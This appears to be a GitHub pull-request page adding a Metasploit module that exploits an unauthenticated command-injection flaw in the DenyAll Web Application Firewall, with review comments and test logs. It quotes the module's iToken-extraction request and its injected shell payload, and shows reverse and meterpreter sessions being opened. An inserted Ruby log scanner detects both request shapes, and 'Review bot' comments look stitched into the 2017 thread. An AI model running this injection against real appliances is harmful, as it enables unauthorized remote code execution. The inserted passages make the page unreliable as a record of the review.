
Adding DenyAll Web Application Firewall RCE module #8980

Merged
merged 3 commits into from Sep 22, 2017

Conversation

mdisec (Contributor) commented Sep 19, 2017

This module exploits the command injection vulnerability of DenyAll Web Application Firewall. An unauthenticated user can execute a terminal command under the context of the web server user.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/linux/http/denyall_waf_exec
  • Set RHOST
  • Set LHOST
  • Run check
  • Verify that you are seeing "The target appears to be vulnerable."
  • Run exploit
  • Verify that you are seeing the iToken value extraction.
  • Verify that you are getting a meterpreter session.
```
msf > use exploit/linux/http/denyall_exec 
msf exploit(denyall_exec) > 
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit 

[*] Started reverse TCP handler on 35.12.3.3:4444 
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Trigerring command injection vulnerability with  iToken value.
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300

meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >
```

Here are the advisory and technical details about that vulnerability.
https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/
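The module's two steps are visible in the code fragments quoted in this review: an unauthenticated GET to `webservices/download/index.php` with `applianceUid=LOCALUID&typeOf=debug` to read the iToken, then a second request to the same endpoint whose `type` parameter carries a shell command substitution. As an added example that is not part of this pull request or of Metasploit, the Ruby script below scans a reverse-proxy access log for both request shapes, which is what a defender watching a DenyAll appliance would want to alert on. It assumes common/combined-format log lines; the function names (`parse_request`, `classify`, `scan_log`) are mine, the embedded log entries are constructed, and the token value in them is a placeholder.

```ruby
require 'uri'

# Endpoint and parameter names are taken from the module code quoted in this review.
TOKEN_ENDPOINT = '/webservices/download/index.php'.freeze
# Shell command-substitution markers: "$(" or a backtick.
SHELL_SUBST = /\$\(|`/

# Request line and status code of a common/combined-format access log entry.
LOG_RE = /"(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+" (?<status>\d{3})/

# Parses one log line into { method:, path:, params:, status: }.
# Returns nil for lines that are not access-log entries or carry a malformed query.
def parse_request(line)
  m = LOG_RE.match(line)
  return nil unless m
  path, _sep, query = m[:target].partition('?')
  params = URI.decode_www_form(query).to_h # percent-decodes keys and values
  { method: m[:method], path: path, params: params, status: m[:status].to_i }
rescue ArgumentError
  nil # invalid %-encoding in the query string
end

# Classifies a parsed request. Returns an array of finding symbols; empty means benign.
def classify(req)
  findings = []
  return findings if req.nil? || !req[:path].end_with?(TOKEN_ENDPOINT)
  params = req[:params]
  # Step 1 of the module: unauthenticated read of the debug download endpoint.
  if params['applianceUid'] == 'LOCALUID' && params['typeOf'] == 'debug'
    findings << :itoken_disclosure
  end
  # Step 2 of the module: a parameter value carrying shell command substitution.
  findings << :command_injection if params.values.any? { |v| v.match?(SHELL_SUBST) }
  findings
end

# Scans many lines; returns only the lines that produced findings, in log order.
def scan_log(lines)
  lines.each_with_object([]) do |line, hits|
    findings = classify(parse_request(line))
    hits << { line: line, findings: findings } unless findings.empty?
  end
end

# Constructed sample log (not captured from a real appliance); the iToken value is a placeholder.
SAMPLE_LOG = [
  '10.0.0.5 - - [19/Sep/2017:14:31:50 +0300] "GET /webservices/download/index.php?applianceUid=LOCALUID&typeOf=debug HTTP/1.1" 200 1532 "-" "curl/7.47.0"',
  '10.0.0.5 - - [19/Sep/2017:14:31:52 +0300] "GET /webservices/download/index.php?applianceUid=LOCALUID&iToken=PLACEHOLDER_TOKEN&tag=tunnel&stime=1505820712&type=1505820712%24%28id%29 HTTP/1.1" 200 0 "-" "curl/7.47.0"',
  '10.0.0.9 - - [19/Sep/2017:14:35:01 +0300] "GET /index.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
  '10.0.0.9 - - [19/Sep/2017:14:35:07 +0300] "POST /webservices/download/index.php?applianceUid=ABC123&typeOf=report HTTP/1.1" 403 212 "-" "Mozilla/5.0"',
  'garbage line that is not an access log entry'
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |hit|
    puts "#{hit[:findings].join(',')} <- #{hit[:line]}"
  end
end
```

Run as-is it prints the two constructed attack lines with their finding labels and stays silent on the benign entries. Because the match is on the decoded query, percent-encoding the `$(` does not evade it; a production rule would also want to decode a second time for double-encoded values and to watch the `type` parameter on this endpoint regardless of which metacharacter is used.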

}
})

if res && res.code == 200 && res.body.include?("iToken")
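Review bot: `res.body.include?("iToken")` only confirms that the literal string `iToken` occurs somewhere in a 200 response, so `check` would report the target as vulnerable for any page that merely mentions the token name without disclosing a value. Match the token value itself with a regex on its expected shape and return the match, and keep that extraction in one method that both `check` and `exploit` call so the two cannot drift apart.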
Contributor

This iToken extraction code should be moved to a separate method since the exact same code is also required for exploiting. We can save on a few lines of code.

Contributor Author

It's done and retested. Thank you very much for review.


h00die commented Sep 21, 2017

If I get some time over the weekend (which is likely), I've got my eye on this.

@@ -0,0 +1,37 @@
## Vulnerable Application

This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.
Contributor

Unauthenticated users


This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.

**Vulnerable Application Installation Steps**
Contributor

For consistency I think you can remove this bold area and just let it all blend in to one.


You just need to follow instruction above URL.

## Verification Steps

## Verification Steps

A successful check of the exploit will look like this:
Contributor

Add the heading of ##Scenarios

super(update_info(info,
'Name' => "DenyAll Web Application Firewall Remote Code Execution",
'Description' => %q{
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a
Contributor

users


def exploit
# Get iToken from unauthenticated accessible endpoint
print_status("Extracting iToken value")
Contributor

change " to '

'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
'vars_get' => {
'applianceUid' => "LOCALUID",
'typeOf' => "debug"
Contributor

change " to '

'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
'vars_get' => {
'applianceUid' => "LOCALUID",
Contributor

change " to '

'iToken' => token,
'tag' => "tunnel",
'stime' => r,
'type' => "#{r}$(python -c \"#{payload.encoded}\")"
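Review bot: on the `'type' => "#{r}$(python -c \"#{payload.encoded}\")"` line the encoded payload is interpolated between escaped double quotes inside a shell command substitution, so any `"`, `$`, backtick or backslash in `payload.encoded` terminates the string before python ever sees it. Either restrict the module to python-source payloads (for example via `Arch` set to `ARCH_PYTHON`) or document in the module's `Payload` section which payloads are known to work, since the php-vs-python question raised above will come up again for users.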
Contributor

If the server is php based, was there a particular reason why the default payload is python? There is a php meterpreter, but I didn't know if the php pushes to python or something like that where python would be the better option.

Contributor Author

Thanks for all the review @h00die. Nodejs, python and different types of technologies are also being used by this product. Also, as far as I know the python meterpreter has many more capabilities than the php one, such as stdapi.

Contributor

I'll give this a run over the weekend; I'll also try out the php payload. It would be a good thing to note that it also works (for curious minds like myself who have encountered issues in the past).

```
msf > use exploit/linux/http/denyall_exec
msf exploit(denyall_exec) >
msf exploit(denyall_exec) > set RHOST 35.176.123.128
Contributor

These look to be public IPs (unverified); you may want to change them to something else like 1.1.1.1 and 2.2.2.2.

Contributor Author

It was my AWS London instance IP that I used for testing purposes. It's not alive anymore.


h00die commented Sep 22, 2017

Worked fine for me! I actually deployed 6.2.0.

```
msf > use exploit/linux/http/denyall_waf_exec 
msf exploit(denyall_waf_exec) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(denyall_waf_exec) > set lhost 2.2.2.2
lhost => 2.2.2.2
msf exploit(denyall_waf_exec) > set reverselistenerbindaddress 3.3.3.3
reverselistenerbindaddress => 3.3.3.3
msf exploit(denyall_waf_exec) > set verbose true
verbose => true
msf exploit(denyall_waf_exec) > check
[*] 1.1.1.1:3001 The target appears to be vulnerable.
msf exploit(denyall_waf_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Extracting iToken value
[+] Awesome. iToken value = w12c319e6dfdcabe1af2488c84d07077
[*] Trigerring command injection vulnerability with iToken value.
[*] Sending stage (42231 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:13926) at 2017-09-21 21:22:02 -0400
[*] Sending stage (42231 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:13784) at 2017-09-21 21:22:09 -0400

meterpreter > sysinfo
Computer        : ip-172-31-34-108
OS              : Linux 3.10.0-327.36.1.el7.x86_64 #1 SMP Sun Sep 18 13:04:29 UTC 2016
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.31.34.108 - Meterpreter session 2 closed.  Reason: User exit
```

Switched to a generic shell as well.

```
msf exploit(denyall_waf_exec) > set payload generic/shell_reverse_tcp 
payload => generic/shell_reverse_tcp
msf exploit(denyall_waf_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] Extracting iToken value
[+] Awesome. iToken value = w12c319e6dfdcabe1af2488c84d07077
[*] Trigerring command injection vulnerability with iToken value.
[*] Command shell session 3 opened (2.2.2.2:4444 -> 1.1.1.1:14236) at 2017-09-21 21:23:04 -0400
whoami
id

daactrl
uid=998(daactrl) gid=999(denyall) groups=999(denyall)
exit
```


h00die commented Sep 22, 2017

A few minor edits on the docs still left to do and I'll get this landed!


h00die commented Sep 22, 2017

I take it back, landing now.

@h00die h00die merged commit 3d543b7 into rapid7:master Sep 22, 2017
h00die added a commit that referenced this pull request Sep 22, 2017

h00die commented Sep 22, 2017

Release Notes

The DenyAll Web Application Firewall Remote Code Execution module has been added to the framework. It targets versions 6.3.0 and 6.2.0.


h00die commented Sep 22, 2017

Thanks for the contribution, looked pretty good from the start, and thanks for being so responsive!
